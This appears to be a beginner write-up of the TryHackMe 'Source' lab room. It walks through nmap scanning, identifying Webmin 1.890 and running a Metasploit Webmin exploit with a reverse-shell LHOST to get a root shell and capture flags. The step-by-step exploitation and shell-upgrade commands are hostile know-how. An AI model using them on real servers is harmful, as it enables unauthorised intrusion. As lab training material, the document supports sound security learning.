Source Room: A TryHackMe 101 Walkthrough

Browser

Introduction:

Welcome to the Source room on the Try Hack Me platform, designed for beginners with an easy difficulty level. This article will explore the steps to hack into the virtual machine using Nmap and Metasploit. So, buckle up, and let’s dive into the world of ethical hacking!

Tools Used:

The Source room utilizes two essential tools for penetration testing:

1. Nmap: A powerful network scanning tool that helps identify open ports, services, and vulnerabilities on a target machine.
2. Metasploit: An exploitation framework that simplifies exploiting vulnerabilities in a target system.

Step 1: Connect to THM VPN

Browser

Before starting, ensure your Try Hack Me VPN is connected and working. If you need assistance with a VPN connection, refer to this article.

Step 2: Launch the Machine

Start the machine provided in the room and let it run for 3–4 minutes before proceeding, a box will appear like below indicating that the machine is working and you will have the IP Address of the newly deployed machine.

Step 3: Ping the Machine

Linux Terminal

Ensure the machine is responsive by pinging it using the terminal of your Kali Linux machine.

Use the command: ping <Machine_IP>.

example:-

ping 10.10.36.29

If successful, proceed to the next step.

Step 4: Port Scanning with Nmap

Linux Terminal

Perform a thorough port scan using Nmap with the command: nmap -vv -T4 -p- <Machine_IP>.

example:-

nmap -vv -T4 -p- 10.10.26.39

Be patient, this may take some time. The flags are used to serve specific purposes

for example:

• -vv: Increase verbosity.
• -T4: Set the scan speed to aggressive.
• -p-: Scan all ports.

Step 5: Analyzing Open Ports

Linux Terminal

As we can now see the open ports and services. Focus on port 10000 as it seems exploitable. However, port 22 is also open with SSH, but without credentials, our focus shifts to port 10000.

Step 6: Accessing Webmin

Browser(Firefox)

Access the web interface of port 10000 in your browser using the URL format http://<Machine_IP>:10000.

example:-

http://10.10.26.39:10000

Bypass security warnings and reach the Webmin login page by following the steps given below:

Step 1:-

Click on the “Advanced” button.

Browser(Firefox)

Step 2:-

Then click the “Accept the Risk and Continue” button.

Browser(Firefox)

Bonus:

Accessing the web interface of port 10000 in your browser using the URL format http://<Machine_IP>:10000, but notice if we access the same link with HTTP instead of HTTPS we will still get a web page but a different page which is:

Browser(Firefox)

as you can see this page provides us with a link but when we click on the link it takes us to a different page which is:

Browser(Firefox)

but we cannot access the Webmin page like we did when we were opening the link with HTTPS, that is because this link tries to connect us with an internal computer, and because our subnet is different from the internal computer we are unable to connect.

Step 7: Identify Webmin Version

Linux Terminal

Run another Nmap scan with the command: nmap -sV -p 10000 <Machine_IP>.

example:-

nmap -sV -p 10000 10.10.26.39

The scan will return the version of the service running on port 10000, Webmin version 1.890.

Step 8: Preparing for Exploitation

Linux Terminal

With the knowledge of Webmin and its version, launch Metasploit with msfconsole -q. Search for Webmin exploits using search webmin and choose the appropriate exploit which is exploit 7, you can select the exploit by using the use 7 command.

Linux Terminal

Step 9: Exploiting with Metasploit

Linux Terminal

You can see the options of the exploit by using the command show options Set the necessary options with set commands, including RHOST (machine IP), SSL (true), and LHOST (THM VPN IP).

example:-

set RHOST 10.10.26.39
set SSL true
set LHOST 10.17.98.201

Linux Terminal

Make sure that the options section looks like this after all the above steps are complete

Linux Terminal

Execute the exploit with run to gain shell access.

Linux Terminal

Step 10: Making the Shell Interactive

Linux Terminal

We will get the shell access after the exploit has done its work but the problem is that the shell we get is not that responsive, so to enhance the shell interactivity we use the following commands:

python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echo;

Step 11: Locate the User and Root Flags

Linux Terminal

Navigate to the root directory by using the cd ..command, find the home directory, and discover the ‘dark’ directory. Retrieve the ‘user.txt’ file, then navigate to the root directory to locate and read the ‘root.txt’ file, we can see the contents of the file by using thecat root.txt command.

Conclusion:

Congratulations! You’ve completed the Source Room on Try Hack Me using Nmap and Metasploit. This walkthrough provides a foundational understanding of basic penetration testing techniques. Keep practicing and exploring to enhance your ethical hacking skills. Happy hacking!